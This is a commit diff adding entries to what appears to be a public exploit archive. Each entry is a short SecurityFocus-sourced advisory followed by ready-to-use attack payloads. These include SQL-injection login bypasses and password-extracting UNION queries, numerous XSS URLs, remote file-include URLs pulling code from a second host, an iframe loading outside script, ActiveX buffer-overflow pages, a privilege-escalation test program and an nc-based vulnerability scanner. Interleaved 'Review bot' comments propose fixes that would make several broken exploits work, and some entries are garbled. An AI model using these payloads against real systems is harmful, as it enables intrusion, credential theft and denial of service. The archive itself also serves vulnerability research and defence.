Updated 01_10_2014

Offensive Security 2014-01-10 18:14:36 +00:00
parent 8198dd43d5
commit 6cacab32e4
43 changed files with 811 additions and 27668 deletions

files.csv
File diff suppressed because it is too large

platforms/asp/webapps/30807.txt Executable file

@ -0,0 +1,10 @@
source: http://www.securityfocus.com/bid/26579/info
DWD Realty is prone to an SQL-injection vulnerability because it fails to sufficiently sanitize user-supplied data before using it in an SQL query.
Exploiting this issue could allow an attacker to compromise the application, access or modify data, or exploit latent vulnerabilities in the underlying database.
The following proof of concept is available:
Username: Admin
Password: anything' OR 'x'='x
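Review bot: the header names no affected version of DWD Realty, while every other advisory in this commit records one; take the version from the BID 26579 source if it lists one, otherwise state explicitly that none was given.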

platforms/asp/webapps/30841.txt Executable file

@ -0,0 +1,19 @@
source: http://www.securityfocus.com/bid/26692/info
Absolute News Manager .NET is prone to multiple remote vulnerabilities, including multiple cross-site scripting, SQL-injection, and information-disclosure issues.
Attackers can exploit these issues to steal cookie-based authentication credentials, execute arbitrary script code in the context of the webserver process, obtain sensitive information, access or modify data, or exploit latent vulnerabilities in the underlying database.
These issues affect Absolute News Manager .NET 5.1; other versions may also be vulnerable.
http://www.example.com/[CustomerDefinedDir]/pages/default.aspx?a=1&template=../web.config
http://www.example.com/[CustomerDefinedDir]/pages/default.aspx?a=1&template=default.aspx%00
http://www.example.com/[CustomerDefinedDir]/pages/?a=1&template=../anmviewer.ascx%00
http://www.example.com/[CustomerDefinedDir]/pages/?a=1&template=../default.aspx%00
http://www.example.com/[CustomerDefinedDir]/pages/?a=1&template=../PPL1HistoryTicker.aspx%00
http://www.example.com/[CustomerDefinedDir]/pages/?a=1&template=../xlagc.ascx%00
http://www.example.com/[CustomerDefinedDir]/pages/?a=1&template=../xlaabsolutenm.aspx%00
http://www.example.com/[CustomerDefinedDir]/pages/?a=1&template=../streamconfig.aspx%00
http://www.example.com/[CustomerDefinedDir]/pages/?a=1&template=../incSystem.aspx%00
http://www.example.com/[CustomerDefinedDir]/pages/?a=1&template=../articlefiles/r.asp%00
http://www.example.com/[CustomerDefinedDir]/pages/?a=1&template=../incSystem.aspx%00
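Review bot: the final URL (`template=../incSystem.aspx%00`) duplicates the one two lines above it; drop one copy so the list of affected template values is accurate.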

platforms/asp/webapps/30842.txt Executable file

@ -0,0 +1,29 @@
source: http://www.securityfocus.com/bid/26692/info
Absolute News Manager .NET is prone to multiple remote vulnerabilities, including multiple cross-site scripting, SQL-injection, and information-disclosure issues.
Attackers can exploit these issues to steal cookie-based authentication credentials, execute arbitrary script code in the context of the webserver process, obtain sensitive information, access or modify data, or exploit latent vulnerabilities in the underlying database.
These issues affect Absolute News Manager .NET 5.1; other versions may also be vulnerable.
http://www.example.com/[CustomerDefinedDir]/xlaabsolutenm.aspx?z=@@version&pz=9&featured=n&ord=desc&sort=posted&rmore=-&
http://www.example.com/[CustomerDefinedDir]/xlaabsolutenm.aspx?z=10&ord=asc&sort=headline'INJECTED_PAYLOAD&rmore=-&
http://www.example.com/[CustomerDefinedDir]/xlaabsolutenm.aspx?z=10&ord=asc'INJECTED_PAYLOAD&sort=headline&rmore=-&
http://www.example.com/[CustomerDefinedDir]/xlaabsolutenm.aspx?z=10'INJECTED_PAYLOAD&ord=asc&sort=headline&rmore=-&
http://www.example.com/[CustomerDefinedDir]/xlaabsolutenm.aspx?z=15'INJECTED_PAYLOAD&ss=y&size=1.1em&target=iframe&
http://www.example.com/[CustomerDefinedDir]/xlaabsolutenm.aspx?z=4&pz=21&ord=asc&sort=headline'INJECTED_PAYLOAD&
http://www.example.com/[CustomerDefinedDir]/xlaabsolutenm.aspx?z=4&pz=21&ord=asc'INJECTED_PAYLOAD&sort=headline&
http://www.example.com/[CustomerDefinedDir]/xlaabsolutenm.aspx?z=4&pz=21'INJECTED_PAYLOAD&ord=asc&sort=headline&
http://www.example.com/[CustomerDefinedDir]/xlaabsolutenm.aspx?z=4'INJECTED_PAYLOAD&pz=21&ord=asc&sort=headline&
http://www.example.com/[CustomerDefinedDir]/xlaabsolutenm.aspx?z=6&ord=desc&sort=posted'INJECTED_PAYLOAD&featured=n&
http://www.example.com/[CustomerDefinedDir]/xlaabsolutenm.aspx?z=6&ord=desc'INJECTED_PAYLOAD&sort=posted&featured=n&
http://www.example.com/[CustomerDefinedDir]/xlaabsolutenm.aspx?z=6&pz=8'INJECTED_PAYLOAD&featured=only&
http://www.example.com/[CustomerDefinedDir]/xlaabsolutenm.aspx?z=6&pz=9&featured=n&ord=desc&sort=posted'INJECTED_PAYLOAD&rmore=-&
http://www.example.com/[CustomerDefinedDir]/xlaabsolutenm.aspx?z=6&pz=9&featured=n&ord=desc'INJECTED_PAYLOAD&sort=posted&rmore=-&
http://www.example.com/[CustomerDefinedDir]/xlaabsolutenm.aspx?z=6&pz=9'INJECTED_PAYLOAD&featured=n&ord=desc&sort=posted&rmore=-&
http://www.example.com/[CustomerDefinedDir]/xlaabsolutenm.aspx?z=6'INJECTED_PAYLOAD&ord=desc&sort=posted&featured=n&
http://www.example.com/[CustomerDefinedDir]/xlaabsolutenm.aspx?z=6'INJECTED_PAYLOAD&pz=8&featured=only&
http://www.example.com/[CustomerDefinedDir]/xlaabsolutenm.aspx?z=6'INJECTED_PAYLOAD&pz=9&featured=n&ord=desc&sort=posted&rmore=-&
http://www.example.com/[CustomerDefinedDir]/xlaabsolutenm.aspx?z=7&ord=desc&sort=posted'INJECTED_PAYLOAD&
http://www.example.com/[CustomerDefinedDir]/xlaabsolutenm.aspx?z=7&ord=desc'INJECTED_PAYLOAD&sort=posted&
http://www.example.com/[CustomerDefinedDir]/xlaabsolutenm.aspx?z=7'INJECTED_PAYLOAD&ord=desc&sort=posted&


@ -0,0 +1,9 @@
source: http://www.securityfocus.com/bid/26692/info
Absolute News Manager .NET is prone to multiple remote vulnerabilities, including multiple cross-site scripting, SQL-injection, and information-disclosure issues.
Attackers can exploit these issues to steal cookie-based authentication credentials, execute arbitrary script code in the context of the webserver process, obtain sensitive information, access or modify data, or exploit latent vulnerabilities in the underlying database.
These issues affect Absolute News Manager .NET 5.1; other versions may also be vulnerable.
http://www.example.com/[CustomerDefinedDir]/xlaabsolutenm.aspx?z=1,7&sort=articleID&ord=desc&rmore=%3Cscript%3Ealert(1)%3C/script%3E&size=2&h=abc&isframe=y


@ -0,0 +1,9 @@
source: http://www.securityfocus.com/bid/26692/info
Absolute News Manager .NET is prone to multiple remote vulnerabilities, including multiple cross-site scripting, SQL-injection, and information-disclosure issues.
Attackers can exploit these issues to steal cookie-based authentication credentials, execute arbitrary script code in the context of the webserver process, obtain sensitive information, access or modify data, or exploit latent vulnerabilities in the underlying database.
These issues affect Absolute News Manager .NET 5.1; other versions may also be vulnerable.
http://www.example.com/[CustomerDefinedDir]/pages/?a=1&template=%3Cscript%3Ealert(2)%3C/script%3E

platforms/asp/webapps/30845.txt Executable file

@ -0,0 +1,18 @@
source: http://www.securityfocus.com/bid/26692/info
Absolute News Manager .NET is prone to multiple remote vulnerabilities, including multiple cross-site scripting, SQL-injection, and information-disclosure issues.
Attackers can exploit these issues to steal cookie-based authentication credentials, execute arbitrary script code in the context of the webserver process, obtain sensitive information, access or modify data, or exploit latent vulnerabilities in the underlying database.
These issues affect Absolute News Manager .NET 5.1; other versions may also be vulnerable.
Webroot PoC:
Requesting the 'getpath.aspx' demo script discloses the physical path of the webroot - ie:
http://www.example.com/[CustomerDefinedDir]/getpath.aspx
"
Absolute News Manager Physical Path :
D:\inetpub\www.example.com\[CustomerDefinedDir]\
Please delete this file from your installation.
"

platforms/cgi/webapps/30808.txt Executable file

@ -0,0 +1,12 @@
source: http://www.securityfocus.com/bid/26582/info
GWExtranet is prone to multiple HTML-injection vulnerabilities because the application fails to sufficiently sanitize user-supplied input data before using it in dynamically generated content.
Attacker-supplied HTML and script code could execute in the context of the affected website, potentially allowing the attacker to steal cookie-based authentication credentials or to control how the site is rendered to the user; other attacks are also possible.
GWExtranet 3.0 is affected by these issues; other versions may also be vulnerable.
http://www.example.com/GWExtranet/scp.dll/frmonth?filter=<EvilScript>
http://www.example.com/GWExtranet/scp.dll/frmonth?user=<EvilScript>
http://www.example.com/GWExtranet/scp.dll/frmonth?month=<EvilScript>
http://www.example.com/GWExtranet/scp.dll?user=USERID&template=<EvilScript>


@ -0,0 +1,9 @@
source: http://www.securityfocus.com/bid/26610/info
ht://Dig is prone to a cross-site scripting vulnerability because it fails to sufficiently sanitize user-supplied data.
Exploiting this issue allows an attacker to execute arbitrary HTML or script code in a user's browser session in the context of an affected site. This may allow the attacker to steal cookie-based authentication credentials and launch other attacks.
This issue affects ht://Dig 3.2.0b6; other versions may also be vulnerable.
http://www.example.com/cgi-bin/htsearch?config=&restrict=&exclude=&method=and&format=builtin-long&sort=<script>alert("foo")</script>&words=foo


@ -0,0 +1,29 @@
source: http://www.securityfocus.com/bid/26659/info
F5 Networks FirePass 4100 SSL VPN devices are prone to a cross-site scripting vulnerability because they fail to properly sanitize user-supplied input.
An attacker may leverage this issue to execute arbitrary script code in the browser of an unsuspecting user in the context of the affected site. This may help the attacker to steal cookie-based authentication credentials and to launch other attacks.
F5 Networks FirePass 4100 SSL VPNs running these firmware versions are vulnerable:
5.4.1 through 5.5.2
6.0
6.0.1
<html>
<iframe src="https://www.example.com/my.logon.php3?%22%3E%3C/script%3E%3Cscript%3Eeval%28name%29%3C/script%3E%3C%21--" width="0%" height="0%" name="xss=document.body.appendChild(document.createElement(&#039;script&#039;));xss.setAttribute(&#039;src&#039;,&#039;http://www.example2.com/b&#039;)"></iframe>
</html>
-----------------------------------------------
Proof of concept (PoC) URL:
https://www.example.com/my.logon.php3?"></script><textarea>HTML_injection_test&lt;/textarea&gt;<!--
The payload in the example is
"></script><textarea>HTML_injection_test&lt;/textarea&gt;<!--
which injects a &#039;textarea&#039; box


@ -0,0 +1,12 @@
source: http://www.securityfocus.com/bid/26661/info
F5 Networks FirePass 4100 SSL VPN devices are prone to a cross-site scripting vulnerability because they fail to properly sanitize user-supplied input.
An attacker may leverage this issue to execute arbitrary script code in the browser of an unsuspecting user in the context of the affected site. This may help the attacker to steal cookie-based authentication credentials and to launch other attacks.
F5 FirePass 4100 SSL VPNs running these firmware versions are vulnerable:
5.4.1 through 5.5.2
6.0 through 6.0.1
https://target.tld/my.activation.php3?"></script><textarea>HTML_injection_test&lt;/textarea&gt;<!--

platforms/linux/local/30839.c Executable file

@ -0,0 +1,32 @@
source: http://www.securityfocus.com/bid/26680/info
ZABBIX is prone to a local privilege-escalation vulnerability.
An attacker can exploit this issue to execute commands with superuser privileges. Successfully exploiting this issue will result in the complete compromise of affected computers.
This issue affects ZABBIX 1.4.2; prior versions may also be affected.
#include <sys/types.h>
#include <unistd.h>
#include <pwd.h>
#include <stdio.h>
int main()
{
struct passwd *pw;
pw = getpwnam("abi");
FILE *pipe;
char buf[25];
setgid(pw->pw_gid);
setuid(pw->pw_uid);
printf("my gid: %d\n", getegid());
printf("my uid: %d\n", getuid());
pipe = popen("/usr/bin/id", "r");
while (fgets(buf, sizeof buf, pipe)) {
printf("%s", buf);
}
printf("\n");
pclose(pipe);
}
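Review bot: `pw = getpwnam("abi");` is dereferenced in `setgid(pw->pw_gid)` with no NULL check, so on any host without an `abi` account the program segfaults before it prints anything; the return values of `setgid`/`setuid` are also discarded, which hides exactly the failure this test is supposed to reveal, and `main` has no `return`. Suggest `if (pw == NULL) { perror("getpwnam"); return 1; }` and checking `setuid(pw->pw_uid) == 0`. The header should also say how this generic setuid/`popen` test relates to ZABBIX 1.4.2, since nothing in the file references ZABBIX.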


@ -0,0 +1,11 @@
source: http://www.securityfocus.com/bid/26588/info
Skype is prone to a remote denial-of-service vulnerability because of a NULL-pointer dereference flaw.
Successfully exploiting this issue allows remote attackers to crash the application, denying service to legitimate users.
Skype 3.6.0.216 for Microsoft Windows is vulnerable to this issue; other versions may also be affected.
The following URI is sufficient to trigger this issue:
skype:?voicemail


@ -0,0 +1,17 @@
source: http://www.securityfocus.com/bid/26669/info
Multiple web browsers are prone to a JavaScript key-filtering vulnerability because the browsers fail to securely handle keystroke input from users.
Exploiting this issue requires that users manually type sensitive data. This may require substantial typing from targeted users, so attackers will likely use keyboard-based games, blogs, or other similar pages to entice users to enter the required keyboard input.
<html>
<title>Firefox 2.0.0.11 File Focus Stealing vulnerability</title>
<body>
<form>
<label>
<input type="file" name="foo" />
<br>
<input type="text" name="bar" />
</label>
</body>
</html>
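Review bot: the header says only "Multiple web browsers" with no version list, while the page title inside the PoC names Firefox 2.0.0.11 and calls it a "File Focus Stealing" issue; the header text and the PoC title should agree on what is being demonstrated and for which browser versions. Minor: `<title>` belongs inside a `<head>` element.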


@ -0,0 +1,9 @@
source: http://www.securityfocus.com/bid/26575/info
PHPSlideShow is prone to a cross-site scripting vulnerability because it fails to sufficiently sanitize user-supplied data.
Exploiting this issue allows attackers to execute arbitrary HTML or script code in a user's browser session in the context of an affected site. This may allow the attacker to steal cookie-based authentication credentials and launch other attacks.
This issue affects PHPSlideShow 0.9.9.2; other versions may also be vulnerable.
http://www.example.com/scripts/demo/phpslideshow.php?directory="><iframe> http://www.example.com/scripts/demo/phpslideshow.php?directory=<html><font color="Red"><b>Pwned</b></font></html> http://www.example.com/scripts/demo/phpslideshow.php?directory=<EMBED SRC="http://site.com/xss.swf" http://www.example.com/scripts/demo/phpslideshow.php?directory=FORM%20ACTION=%22search.php%22%20METHOD=%22GET%22%3E
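Review bot: four separate test URLs are run together on a single line, so a reader cannot tell where one ends and the next begins (the `<EMBED SRC=...` fragment is also missing its closing `>`); put one URL per line as the other entries in this commit do.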

platforms/php/webapps/30810.txt Executable file

@ -0,0 +1,14 @@
source: http://www.securityfocus.com/bid/26584/info
Proverbs Web Calendar is prone to an SQL-injection vulnerability because it fails to sufficiently sanitize user-supplied data before using it in an SQL query.
Exploiting this issue could allow an attacker to compromise the application, access or modify data, or exploit latent vulnerabilities in the underlying database.
Proverbs Web Calendar 1.1 is vulnerable; other versions may also be affected.
The following proof of concept is available:
Username: admin
Password: ' or
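Review bot: the password line `' or` ends mid-expression and reads as truncated; confirm against the BID 26584 source that the line is complete as published, and if it is not, mark the entry as partial rather than leaving it ambiguous.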


@ -0,0 +1,9 @@
source: http://www.securityfocus.com/bid/26585/info
SimpleGallery is prone to a cross-site scripting vulnerability because it fails to sufficiently sanitize user-supplied data.
Exploiting this issue allows attackers to execute arbitrary HTML or script code in a user's browser session in the context of an affected site. This may allow the attacker to steal cookie-based authentication credentials and launch other attacks.
This issue affects SimpleGallery 0.1.3; other versions may also be vulnerable.
http://www.example.com/PATH/index.php?album=[XSS]


@ -0,0 +1,9 @@
source: http://www.securityfocus.com/bid/26587/info
FMDeluxe is prone to a cross-site scripting vulnerability because it fails to sufficiently sanitize user-supplied data.
Exploiting this issue allows an attacker to execute arbitrary HTML or script code in a user's browser session in the context of an affected site. This may allow the attacker to steal cookie-based authentication credentials and launch other attacks.
This issue affects FMDeluxe 2.1.0; other versions may also be affected.
http://www.example.com/PATH/index.php?action=category&id=[XSS]

platforms/php/webapps/30815.txt Executable file

@ -0,0 +1,10 @@
source: http://www.securityfocus.com/bid/26592/info
Tilde is prone to a cross-site scripting vulnerability because the application fails to properly sanitize user-supplied input.
An attacker may leverage this issue to execute arbitrary script code in the browser of an unsuspecting user in the context of the affected site. This may help the attacker steal cookie-based authentication credentials and launch other attacks.
Tilde 4.0 is vulnerable; other versions may also be affected.
http://www.example.com/[tilde_path]/index.php?id=[yeardetail_id]&mode=yeardetail&aarstal=[XSS]


@ -0,0 +1,11 @@
source: http://www.securityfocus.com/bid/26606/info
Liferay Portal is prone to a cross-site scripting vulnerability because the application fails to properly sanitize user-supplied input.
An attacker may leverage this issue to execute arbitrary script code in the browser of an unsuspecting user in the context of the affected site. This may help the attacker steal cookie-based authentication credentials and launch other attacks.
Liferay Portal 4.3.1 is vulnerable; other versions may also be affected.
"><script>alert(&#039;xss&#039;)</script>
<html><b>XSS</b></font></html>
"><iframe>
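Review bot: the three payload lines are given without the URL or parameter they apply to, unlike every other XSS entry in this commit, so the record cannot be reproduced or mitigated from this file alone; add the affected endpoint and parameter. Also `</font>` closes a `<font>` that is never opened, and `alert(&#039;xss&#039;)` carries HTML entities where the script needs literal quotes.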


@ -0,0 +1,9 @@
source: http://www.securityfocus.com/bid/26614/info
p.mapper is prone to multiple remote file-include vulnerabilities because it fails to sufficiently sanitize user-supplied data.
Exploiting these issues may allow an attacker to compromise the application and the underlying system; other attacks are also possible.
These issues affect p.mapper 3.2.0 beta3; other versions may also be vulnerable.
http://www.example.com/pmapper-3.2-beta3/incphp/globals.php?_SESSION[PM_INCPHP]=http://www.example2.com


@ -0,0 +1,9 @@
source: http://www.securityfocus.com/bid/26614/info
p.mapper is prone to multiple remote file-include vulnerabilities because it fails to sufficiently sanitize user-supplied data.
Exploiting these issues may allow an attacker to compromise the application and the underlying system; other attacks are also possible.
These issues affect p.mapper 3.2.0 beta3; other versions may also be vulnerable.
http://www.example.com/pmapper-3.2-beta3/plugins/export/mc_table.php?_SESSION[PM_INCPHP]=http://www.example2.com

platforms/php/webapps/30822.txt Executable file

@ -0,0 +1,14 @@
source: http://www.securityfocus.com/bid/26620/info
BEA AquaLogic Interaction is prone to multiple information-disclosure vulnerabilities.
Attackers can exploit these issues to access valid usernames in the Plumtree portal as well as the server hostname, build date, and server version. Information harvested can aid in further attacks.
The following versions are vulnerable:
BEA Plumtree Foundation in the 5.0 series, version 6.0 through service pack 1 on all platforms
BEA AquaLogic Interaction 6.1 through service pack 1 on all platforms
https://www.example.com/portal/server.pt?in_hi_req_objtype=1&space=SearchResult&in_tx_fulltext=*&in_hi_req_ apps=1&control=advancedstart&in_hi_req_page=100&parentname=AdvancedSearch&in_ra_ topoperator=and
https://www.example.com/portal/server.pt?in_hi_req_objtype=1&space=SearchResult&in_tx_fulltext=*admin*&in_hi_ req_apps=1&control=advancedstart&in_hi_req_page=100&parentname=AdvancedSearch&in_ra_ topoperator=and
https://www.example.com/portal/server.pt?in_hi_req_objtype=1&space=SearchResult&in_tx_fulltext=*test*&in_hi_req_apps= 1&control=advancedstart&in_ hi_req_page=100&parentname=AdvancedSearch&in_ra_topoperator=and
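Review bot: the query strings contain stray spaces inside parameter names (`in_hi_req_ apps`, `in_ra_ topoperator`, `in_ hi_req_page`), which look like line-wrap residue from the source; as committed the parameters would not match what the portal expects, so the spaces should be removed.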

platforms/php/webapps/30823.txt Executable file

@ -0,0 +1,11 @@
source: http://www.securityfocus.com/bid/26629/info
The 'bcoos' program is prone to multiple input-validation vulnerabilities, including SQL-injection issues and cross-site scripting issues, because it fails to sufficiently sanitize user-supplied data.
These issues affect the application's arcade, myalbum, mylinks, and ecal modules.
Exploiting these issues could allow an attacker to steal cookie-based authentication credentials, compromise the application, access or modify data, or exploit latent vulnerabilities in the underlying database.
These issues affect bcoos 1.0.10; other versions may also be affected.
http://www.example.com/modules/myalbum/ratephoto.php?lid=-1%20UNION%20SELECT%20pass%20FROM%20bcoos_users%20LIMIT%201

platforms/php/webapps/30824.txt Executable file

@ -0,0 +1,11 @@
source: http://www.securityfocus.com/bid/26629/info
The 'bcoos' program is prone to multiple input-validation vulnerabilities, including SQL-injection issues and cross-site scripting issues, because it fails to sufficiently sanitize user-supplied data.
These issues affect the application's arcade, myalbum, mylinks, and ecal modules.
Exploiting these issues could allow an attacker to steal cookie-based authentication credentials, compromise the application, access or modify data, or exploit latent vulnerabilities in the underlying database.
These issues affect bcoos 1.0.10; other versions may also be affected.
http://www.example.com/modules/mylinks/ratelink.php?lid=-1%20UNION%20SELECT%20pass%20FROM%20bcoos_users%20LIMIT%201


@ -0,0 +1,9 @@
source: http://www.securityfocus.com/bid/26654/info
Ossigeno CMS is prone to multiple remote file-include vulnerabilities because it fails to sufficiently sanitize user-supplied data.
Exploiting these issues may allow an attacker to compromise the application and the underlying system; other attacks are also possible.
These issues affect Ossigeno CMS 2.2_pre1; other versions may also be vulnerable.
http://www.example.com/upload/xax/admin/modules/install_module.php?level=http://www.example2.com


@ -0,0 +1,9 @@
source: http://www.securityfocus.com/bid/26654/info
Ossigeno CMS is prone to multiple remote file-include vulnerabilities because it fails to sufficiently sanitize user-supplied data.
Exploiting these issues may allow an attacker to compromise the application and the underlying system; other attacks are also possible.
These issues affect Ossigeno CMS 2.2_pre1; other versions may also be vulnerable.
http://www.example.com/upload/xax/admin/modules/uninstall_module.php?level=http://www.example2.com


@ -0,0 +1,9 @@
source: http://www.securityfocus.com/bid/26654/info
Ossigeno CMS is prone to multiple remote file-include vulnerabilities because it fails to sufficiently sanitize user-supplied data.
Exploiting these issues may allow an attacker to compromise the application and the underlying system; other attacks are also possible.
These issues affect Ossigeno CMS 2.2_pre1; other versions may also be vulnerable.
http://www.example.com/upload/xax/admin/patch/index.php?level=http://www.example2.com


@ -0,0 +1,9 @@
source: http://www.securityfocus.com/bid/26654/info
Ossigeno CMS is prone to multiple remote file-include vulnerabilities because it fails to sufficiently sanitize user-supplied data.
Exploiting these issues may allow an attacker to compromise the application and the underlying system; other attacks are also possible.
These issues affect Ossigeno CMS 2.2_pre1; other versions may also be vulnerable.
http://www.example.com/upload/xax/ossigeno/admin/install_module.php?level=http://www.example2.com


@ -0,0 +1,9 @@
source: http://www.securityfocus.com/bid/26654/info
Ossigeno CMS is prone to multiple remote file-include vulnerabilities because it fails to sufficiently sanitize user-supplied data.
Exploiting these issues may allow an attacker to compromise the application and the underlying system; other attacks are also possible.
These issues affect Ossigeno CMS 2.2_pre1; other versions may also be vulnerable.
http://www.example.com/upload/xax/ossigeno/admin/uninstall_module.php?level=http://www.example2.com


@ -0,0 +1,9 @@
source: http://www.securityfocus.com/bid/26654/info
Ossigeno CMS is prone to multiple remote file-include vulnerabilities because it fails to sufficiently sanitize user-supplied data.
Exploiting these issues may allow an attacker to compromise the application and the underlying system; other attacks are also possible.
These issues affect Ossigeno CMS 2.2_pre1; other versions may also be vulnerable.
http://www.example.com/ossigeno_modules/ossigeno-catalogo/xax/ossigeno/catalogo/common.php?ossigeno=http://www.example2.com


@ -0,0 +1,9 @@
source: http://www.securityfocus.com/bid/26664/info
The 'bcoos' program is prone to an SQL-injection vulnerability because it fails to adequately sanitize user-supplied input before using it in an SQL query.
A successful exploit may allow an attacker to compromise the application, access or modify data, or exploit latent vulnerabilities in the underlying database.
This issue affects bcoos 1.0.10; other versions may also be affected.
http://www.example.com/modules/adresses/ratefile.php?lid=-1%20UNION%20SELECT%20pass%20FROM%20bcoos_users%20LIMIT%201


@ -0,0 +1,9 @@
source: http://www.securityfocus.com/bid/26698/info
phpMyChat is prone to multiple cross-site scripting vulnerabilities because it fails to properly sanitize user-supplied input.
An attacker may leverage these issues to execute arbitrary script code in the browser of an unsuspecting user in the context of the affected site. This may allow the attacker to steal cookie-based authentication credentials and to launch other attacks.
phpMyChat 0.14.5 is vulnerable; other versions may also be affected.
http://www.example.com/phpmychat/chat/deluser.php3?L=english&Link=&LIMIT=>"&#039;><img%20src%3D%26%23x6a;%26%23x61;%26%23x76;%26%23x61;%26%23x73;%26%23x63;%26%23x72;%26%23x69;%26%23x70;%26%23x74;%26%23x3a;alert(%26quot;Successfull%26%23x20;XSS%26%23x20;Test%26%23x20;Here%26quot;)>&AUTH_USERNAME=&AUTH_PASSWORD=

platforms/php/webapps/30847.txt Executable file

@ -0,0 +1,12 @@
source: http://www.securityfocus.com/bid/26698/info
phpMyChat is prone to multiple cross-site scripting vulnerabilities because it fails to properly sanitize user-supplied input.
An attacker may leverage these issues to execute arbitrary script code in the browser of an unsuspecting user in the context of the affected site. This may allow the attacker to steal cookie-based authentication credentials and to launch other attacks.
phpMyChat 0.14.5 is vulnerable; other versions may also be affected.
http://www.example.com/mychat/chat/users_popupL.php3?From=..%2FphpMyChat.php3&L=english&LastCheck=
"></STYLE><STYLE>@import"javascript:alert(&#039;This%20XSS%20Is%20Xss&#039;)";</STYLE>&#039;
=http://www.example.com/phpmychat/chat/users_popupL.php3?From=..%2FphpMyChat.php3&L=english&LastCheck=1196698786&B=
>"><script>alert("This%20XSS%20Test%20Successful")</script>
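Review bot: the two test URLs are broken across four lines, with the `LastCheck=` value of the first continued on the following line and the second URL starting with a stray `=`; restore one URL per line so the record is unambiguous.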

platforms/unix/remote/30835.sh Executable file

@ -0,0 +1,27 @@
source: http://www.securityfocus.com/bid/26663/info
Apache is prone to a cross-site scripting weakness when handling HTTP request methods that result in 413 HTTP errors.
An attacker may exploit this issue to steal cookie-based authentication credentials and launch other attacks.
Apache 2.0.46 through 2.2.4 are vulnerable; other versions may also be affected.
#!/bin/bash
# PR07-37-scan
if [ $# -ne 1 ]
then
echo "$0 <hosts-file>"
exit
fi
for i in `cat $1`
do
if echo -en "<PROCHECKUP> / HTTP/1.1\nHost: $i\nConnection:
close\nContent-length: 0\nContent-length: 0\n\n" | nc -w 4 $i 80 | grep
-i '<PROCHECKUP>' > /dev/null
then
echo "$i is VULNERABLE!"
fi
done
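Review bot: the `echo -en "..."` string and the `grep -i '<PROCHECKUP>'` command are split across physical lines, which is a syntax error in bash as committed (the string is unterminated on its first line and `-i` begins a new command); join each into a single line. Also `exit` after the usage message returns 0 (use `exit 1`), and `for i in \`cat $1\`` splits on whitespace, so `while read -r i; do ...; done < "$1"` is the safer loop.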


@ -1,26 +0,0 @@
**************************************************************
Product: Everfocus EDSR series
Version affected: 1.4 and older
Website: http://www.everfocus.com/
Discovered By: Andrea Fabrizi
Email: andrea.fabrizi () gmail com
Web: http://www.andreafabrizi.it
Vuln: remote DVR applet authentication bypass
**************************************************************
The EDSR firmware don't handle correctly users authentication and sessions.
This exploit let you to connect to every remote DVR (without username
and password) and see the live cams :)
Exploit: http://www.andreafabrizi.it/files/EverFocus_Edsr_Exploit.tar.gz
I discovered this vulnerability one year ago and i have informed the
vendor, but apparently
there is no solution at this time.
--
Andrea Fabrizi
http://www.andreafabrizi.it
http://www.exploit-db.com/sploits/2009-11-22-EverFocus_Edsr_Exploit.tar.gz
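Review bot: the commit message "Updated 01_10_2014" gives no reason for removing this Everfocus EDSR entry; state why it was dropped (re-filed under another ID, linked archive no longer available, or similar) so the history of the record stays traceable.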


@ -0,0 +1,37 @@
source: http://www.securityfocus.com/bid/26586/info
The RealPlayer ActiveX control is prone to a buffer-overflow vulnerability because the software fails to properly bounds-check user-supplied data before copying it to an insufficiently sized buffer.
A remote attacker may exploit this vulnerability by presenting a malicious file to a victim and enticing them to open it with the vulnerable application.
Successful exploits can allow attackers to run arbitrary code in the context of the user running an application that uses the control (typically Internet Explorer). Failed attacks will likely cause denial-of-service conditions.
This issue affects RealPlayer 10.5; other versions may also be affected.
NOTE: This issue was originally covered in BID 22811 - RealMedia RealPlayer Ierpplug.DLL ActiveX Control Multiple Buffer Overflow Vulnerabilities.
<!--
written by e.b.
-->
<html>
<head>
<script language="JavaScript" DEFER>
function Check() {
var s = "AAAA";
while (s.length < 999999) s=s+s;
var obj = new ActiveXObject("IERPCTL.IERPCTL"); //{FDC7A535-4070-4B92-A0EA-D9994BCC0DC5}
var obj2 = obj.PlayerProperty(s);
}
</script>
</head>
<body onload="JavaScript: return Check();">
</body>


@ -0,0 +1,28 @@
source: http://www.securityfocus.com/bid/26630/info
Microsoft Windows Digital Rights Management (DRM) ActiveX control is prone to a buffer-overflow vulnerability because it fails to perform adequate boundary checks on user-supplied data.
Successfully exploiting this issue allows remote attackers to execute arbitrary code in the context of the application using the ActiveX control (typically Internet Explorer). Failed exploit attempts likely result in denial-of-service conditions.
<html>
<script>
function test()
{
var obj;
var x;
x = "AAAA";
for (i=0;i<=21;++i)
x += x;
obj = document.getElementById(&#039;testObj&#039;);
obj.StoreLicense(x);
}
</script>
<body onload="test();">
<object id=&#039;testObj&#039;
classid="CLSID:{760c4b83-e211-11d2-bf3e-00805fbe84a6}">
</object>
</body>
</html>
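Review bot: `document.getElementById(&#039;testObj&#039;)` sits inside a `<script>` block, where the HTML parser does not decode entities, so as committed this line is a JavaScript syntax error and `StoreLicense` is never reached; it should read `getElementById('testObj')`. The same entities in the `<object id=...>` attribute are at least decoded by the parser, but literal quotes are clearer there too. Minor: `i` in the `for` loop is never declared.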


@ -0,0 +1,9 @@
source: http://www.securityfocus.com/bid/26656/info
Yahoo! Toolbar ActiveX Control is prone to a buffer-overflow vulnerability.
An attacker can exploit this issue to trigger denial-of-service conditions in Internet Explorer or other applications that use the vulnerable ActiveX control. Reports indicate that code execution is not possible, but this has not been confirmed.
Yahoo! Toolbar 1.4.1 is vulnerable to this issue; other versions may also be affected.
<html><body> <object id=target classid=clsid:02478D38-C3F9-4EFB-9B51-7695ECA05670></object> <script language=vbscript> arg1=String(517140, "A") target.c arg1 </script> </body></html>

platforms/windows/dos/30840.txt Executable file

@ -0,0 +1,13 @@
source: http://www.securityfocus.com/bid/26689/info
SonicWALL Global VPN Client is prone to a remote format-string vulnerability because it fails to properly sanitize user-supplied input before passing it as the format specifier to a formatted-printing function.
Successfully exploiting this issue allows remote attackers to execute arbitrary machine code in the context of the application. Failed attempts may cause denial-of-service conditions.
Versions prior to SonicWALL Global VPN Client 4.0.0.830 are affected.
The following proof of concept was supplied:
<Connection name=> AAAAAAAAAA%x.%x.%x.%x.%x.%x.%x.%x.%x.%x.%x.%x.%x.%x.%
x.%x
<HostName> BBBBBBBBBB%x.%x.%x.%x.%x.%x.%x.%x.%x.%x.%x.%x.%x.%x.%x.%x.%
x.%x.%x.%x.%x.%x.%x
